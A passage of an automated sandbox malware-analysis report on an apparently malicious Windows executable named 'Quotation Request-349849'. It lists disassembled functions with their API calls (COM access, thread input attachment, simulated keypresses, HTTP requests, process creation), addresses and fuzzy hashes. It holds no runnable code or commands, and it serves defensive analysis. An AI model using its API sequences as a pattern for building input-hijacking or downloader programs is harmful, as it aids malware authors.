                                                      • Opcode Fuzzy Hash: 6e78c074890dac42a9184e4f61b1405b4c0882afff66003f583d6b069b0f8ae5
                                                      • Instruction Fuzzy Hash: 0011947624831BF9EA112664EC0EDA73B9CFB15720F300066FA30E55D2FE6D98A15694
                                                      Function 008488AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 008488D7
                                                      • CoInitialize.OLE32(00000000), ref: 00848904
                                                      • CoUninitialize.OLE32 ref: 0084890E
                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00848A0E
                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00848B3B
                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00862C0C), ref: 00848B6F
                                                      • CoGetObject.OLE32(?,00000000,00862C0C,?), ref: 00848B92
                                                      • SetErrorMode.KERNEL32(00000000), ref: 00848BA5
                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00848C25
                                                      • VariantClear.OLEAUT32(?), ref: 00848C35
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                      • String ID:
                                                      • API String ID: 2395222682-0
                                                      • Opcode ID: e1aef05d4d476a109e6385f68618a0d012344a1a8f6400a23e6832e1af3eb98b
                                                      • Instruction ID: 14a07fe9b949a9c3ea43352190afe8ad6000b6bbd41899b629592bab72f47290
                                                      • Opcode Fuzzy Hash: e1aef05d4d476a109e6385f68618a0d012344a1a8f6400a23e6832e1af3eb98b
                                                      • Instruction Fuzzy Hash: 90C1D1B1608309EFD700DF68C88492ABBE9FB89758F00496DF989DB251DB71ED05CB52
                                                      Function 00837990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00837A6C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ArraySafeVartype
                                                      • String ID:
                                                      • API String ID: 1725837607-0
                                                      • Opcode ID: 21c1c77cccaffbe64c2c0bee7b529880568242c948b591b66f5f199c3c662223
                                                      • Instruction ID: 86481eef7af678deb5cfcb97b55693a782e9947b7185fad95b01a366444375f9
                                                      • Opcode Fuzzy Hash: 21c1c77cccaffbe64c2c0bee7b529880568242c948b591b66f5f199c3c662223
                                                      • Instruction Fuzzy Hash: F4B160B190421A9FDB20DFA8C885BBEB7B4FF89325F144429EA01E7251D778E941CBD1
                                                      Function 008311CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 008311F0
                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00830268,?,00000001), ref: 00831204
                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0083120B
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00830268,?,00000001), ref: 0083121A
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0083122C
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00830268,?,00000001), ref: 00831245
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00830268,?,00000001), ref: 00831257
                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00830268,?,00000001), ref: 0083129C
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00830268,?,00000001), ref: 008312B1
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00830268,?,00000001), ref: 008312BC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                      • String ID:
                                                      • API String ID: 2156557900-0
                                                      • Opcode ID: 22627d0c58d9c1d89b08d670463b7e541d5089ae6cdf2a20e72e0c36e6922959
                                                      • Instruction ID: b06525bb06c757074c244a1fbcb07131d0125f70ec4b9b8a3f11f530ea5378f0
                                                      • Opcode Fuzzy Hash: 22627d0c58d9c1d89b08d670463b7e541d5089ae6cdf2a20e72e0c36e6922959
                                                      • Instruction Fuzzy Hash: 6C319175601304BBDF10EF54EC48F6A77A9FB94712F148116F902C71A1EBB89D508BA0
                                                      Function 007DFA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007DFAA6
                                                      • OleUninitialize.OLE32(?,00000000), ref: 007DFB45
                                                      • UnregisterHotKey.USER32(?), ref: 007DFC9C
                                                      • DestroyWindow.USER32(?), ref: 008145D6
                                                      • FreeLibrary.KERNEL32(?), ref: 0081463B
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00814668
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                      • String ID: close all
                                                      • API String ID: 469580280-3243417748
                                                      • Opcode ID: 498f93752a6401279f57661f8eaf21117c113bcd16f458552891b1a68308b246
                                                      • Instruction ID: 4359d4a766e21994ecfb225798cb1992dd9fc55d479c4fcf4060f1ce62822b6d
                                                      • Opcode Fuzzy Hash: 498f93752a6401279f57661f8eaf21117c113bcd16f458552891b1a68308b246
                                                      • Instruction Fuzzy Hash: 06A16B30301216CFDB18EF14C599AA9F364FF15714F1442AEE90AAB362DB34AC56CF90
                                                      Function 0082A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EnumChildWindows.USER32(?,0082A439), ref: 0082A377
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ChildEnumWindows
                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                      • API String ID: 3555792229-1603158881
                                                      • Opcode ID: de551adf051c2204c01cb524a236abf1fd145e67db29489cbacd50eaa02221a2
                                                      • Instruction ID: 261816e404eb0d7b8f442b5b0651c50778395a500935ac2dad75c042858ebb09
                                                      • Opcode Fuzzy Hash: de551adf051c2204c01cb524a236abf1fd145e67db29489cbacd50eaa02221a2
                                                      • Instruction Fuzzy Hash: 69919F31600619EBCB0CEFA0D845BEEFB75FF04304F548119E95AE7241DB35A999CB91
                                                      Function 007D2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowLongW.USER32(?,000000EB), ref: 007D2EAE
                                                        • Part of subcall function 007D1DB3: GetClientRect.USER32(?,?), ref: 007D1DDC
                                                        • Part of subcall function 007D1DB3: GetWindowRect.USER32(?,?), ref: 007D1E1D
                                                        • Part of subcall function 007D1DB3: ScreenToClient.USER32(?,?), ref: 007D1E45
                                                      • GetDC.USER32 ref: 0080CD32
                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0080CD45
                                                      • SelectObject.GDI32(00000000,00000000), ref: 0080CD53
                                                      • SelectObject.GDI32(00000000,00000000), ref: 0080CD68
                                                      • ReleaseDC.USER32(?,00000000), ref: 0080CD70
                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0080CDFB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                      • String ID: U
                                                      • API String ID: 4009187628-3372436214
                                                      • Opcode ID: 8b3c33418e64b3457fb6b9f0c12db9baa9892ec116ca1d43733cf3e4709646de
                                                      • Instruction ID: 3de9b03be62dd32de410546eab826f526bbef0a54491a821b6ef2c61f589ccae
                                                      • Opcode Fuzzy Hash: 8b3c33418e64b3457fb6b9f0c12db9baa9892ec116ca1d43733cf3e4709646de
                                                      • Instruction Fuzzy Hash: D571D031500209EFCF619F64CC88AAA7FB5FF58325F18437AED559A2A6D7348C42DB60
                                                      Function 00841A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00841A50
                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00841A7C
                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00841ABE
                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00841AD3
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00841AE0
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00841B10
                                                      • InternetCloseHandle.WININET(00000000), ref: 00841B57
                                                        • Part of subcall function 00842483: GetLastError.KERNEL32(?,?,00841817,00000000,00000000,00000001), ref: 00842498
                                                        • Part of subcall function 00842483: SetEvent.KERNEL32(?,?,00841817,00000000,00000000,00000001), ref: 008424AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                      • String ID:
                                                      • API String ID: 2603140658-3916222277
                                                      • Opcode ID: c63f129cdb816f057cdb753d4880b8d06641eda76b6e456fa21e1e2bfab3fcb0
                                                      • Instruction ID: 17804d705054918664ca997ed62d7b06022854d8cd7c56a48ba1703eadcc170c
                                                      • Opcode Fuzzy Hash: c63f129cdb816f057cdb753d4880b8d06641eda76b6e456fa21e1e2bfab3fcb0
                                                      • Instruction Fuzzy Hash: 3F414CB150121CBFEF119F50CC89FBA7BADFB08355F00412AFA05DA141E7749E849BA5
                                                      Function 00848C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0085F910), ref: 00848D28
                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0085F910), ref: 00848D5C
                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00848ED6
                                                      • SysFreeString.OLEAUT32(?), ref: 00848F00
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                      • String ID:
                                                      • API String ID: 560350794-0
                                                      • Opcode ID: 82411a0656a0953d86fc066803d086f720e168692ab58f6d0de0d48be9b8d64c
                                                      • Instruction ID: ef62f3cca152f49d197dc16b2ee56109ae952e2f67c41594238e1c44a051c80e
                                                      • Opcode Fuzzy Hash: 82411a0656a0953d86fc066803d086f720e168692ab58f6d0de0d48be9b8d64c
                                                      • Instruction Fuzzy Hash: EEF10671A00219EFDB14DF94C888EAEB7B9FF49315F108499FA06EB251DB31AE45CB50
                                                      Function 0084F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 0084F6B5
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0084F848
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0084F86C
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0084F8AC
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0084F8CE
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0084FA4A
                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0084FA7C
                                                      • CloseHandle.KERNEL32(?), ref: 0084FAAB
                                                      • CloseHandle.KERNEL32(?), ref: 0084FB22
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                      • String ID:
                                                      • API String ID: 4090791747-0
                                                      • Opcode ID: c17612c41bef026a346bde5bee740f23f82f01e191432593f9d6cc7368138b85
                                                      • Instruction ID: 28a430e68072f58a864a1502f1de115a71ed8531cf35ed10e07b1b7c4e8d9677
                                                      • Opcode Fuzzy Hash: c17612c41bef026a346bde5bee740f23f82f01e191432593f9d6cc7368138b85
                                                      • Instruction Fuzzy Hash: 45E19B31604244DFC714EF24C885A6ABBE1FF89314F14846DFA998B3A2DB34EC41CB52
                                                      Function 00834CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0083466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00833697,?), ref: 0083468B
                                                        • Part of subcall function 0083466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00833697,?), ref: 008346A4
                                                        • Part of subcall function 00834A31: GetFileAttributesW.KERNEL32(?,0083370B), ref: 00834A32
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00834D40
                                                      • _wcscmp.LIBCMT ref: 00834D5A
                                                      • MoveFileW.KERNEL32(?,?), ref: 00834D75
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                      • String ID:
                                                      • API String ID: 793581249-0
                                                      • Opcode ID: b05651b8e1053e4f430c475e04ddb03a21687696e012b38ef8fad38fa3a2f1a2
                                                      • Instruction ID: 3732821a565fba9c8bb0f9cd980b678e0e8c0303b4558c402f4dfdb93808f8e9
                                                      • Opcode Fuzzy Hash: b05651b8e1053e4f430c475e04ddb03a21687696e012b38ef8fad38fa3a2f1a2
                                                      • Instruction Fuzzy Hash: 895131B21083459BC725DBA4D8859DFB3ECFF84350F50192EB689D3152EE34B588C7A6
                                                      Function 00858645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 008586FF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID:
                                                      • API String ID: 634782764-0
                                                      • Opcode ID: cc3e48fdcf3841d7c4d7e5a5c6c2a088f2310cc1ac6c4b135732671c3ac74fbe
                                                      • Instruction ID: 22b263e85e8cdaf16b0b20b1f1ac8e4e887d74160dc99aabf1779cdf52b1c56e
                                                      • Opcode Fuzzy Hash: cc3e48fdcf3841d7c4d7e5a5c6c2a088f2310cc1ac6c4b135732671c3ac74fbe
                                                      • Instruction Fuzzy Hash: 9951A130500244FEEF209B298C89FAD3BA5FB19356F604127FE51F62A1CF75A988CB41
                                                      Function 007D2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0080C2F7
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0080C319
                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0080C331
                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0080C34F
                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0080C370
                                                      • DestroyIcon.USER32(00000000), ref: 0080C37F
                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0080C39C
                                                      • DestroyIcon.USER32(?), ref: 0080C3AB
                                                        • Part of subcall function 0085A4AF: DeleteObject.GDI32(00000000), ref: 0085A4E8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                      • String ID:
                                                      • API String ID: 2819616528-0
                                                      • Opcode ID: 08942492b406b04a08feac23fa0fb7264c2f2efe7e3c1869b95c57ee99489703
                                                      • Instruction ID: 8bbce19f3bf9ade855c69067b7847473cae5b92497c1f2f66b427986670c4f82
                                                      • Opcode Fuzzy Hash: 08942492b406b04a08feac23fa0fb7264c2f2efe7e3c1869b95c57ee99489703
                                                      • Instruction Fuzzy Hash: EC515870610205AFDB20DF64CC45BAA3BB5FB58311F10462AF902E73A1E7B4AD52DB60
                                                      Function 0082966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0082A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0082A84C
                                                        • Part of subcall function 0082A82C: GetCurrentThreadId.KERNEL32 ref: 0082A853
                                                        • Part of subcall function 0082A82C: AttachThreadInput.USER32(00000000,?,00829683,?,00000001), ref: 0082A85A
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0082968E
                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008296AB
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 008296AE
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 008296B7
                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 008296D5
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008296D8
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 008296E1
                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 008296F8
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008296FB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                      • String ID:
                                                      • API String ID: 2014098862-0
                                                      • Opcode ID: 91958b5524238a5765ee7e6402ac2f7b1e69f5bc27f079345682f9bc7019ffa9
                                                      • Instruction ID: 4c0acec6e3a7f3e19452af57d42edb64adeb888235452d5fd1dce838343b1a2b
                                                      • Opcode Fuzzy Hash: 91958b5524238a5765ee7e6402ac2f7b1e69f5bc27f079345682f9bc7019ffa9
                                                      • Instruction Fuzzy Hash: DE11E1B1950618BFF6106F64EC89F6A3B6DFB4C752F100425F344AB0A1C9F25C50DAA4
                                                      Function 00828921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0082853C,00000B00,?,?), ref: 0082892A
                                                      • HeapAlloc.KERNEL32(00000000,?,0082853C,00000B00,?,?), ref: 00828931
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0082853C,00000B00,?,?), ref: 00828946
                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,0082853C,00000B00,?,?), ref: 0082894E
                                                      • DuplicateHandle.KERNEL32(00000000,?,0082853C,00000B00,?,?), ref: 00828951
                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0082853C,00000B00,?,?), ref: 00828961
                                                      • GetCurrentProcess.KERNEL32(0082853C,00000000,?,0082853C,00000B00,?,?), ref: 00828969
                                                      • DuplicateHandle.KERNEL32(00000000,?,0082853C,00000B00,?,?), ref: 0082896C
                                                      • CreateThread.KERNEL32(00000000,00000000,00828992,00000000,00000000,00000000), ref: 00828986
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
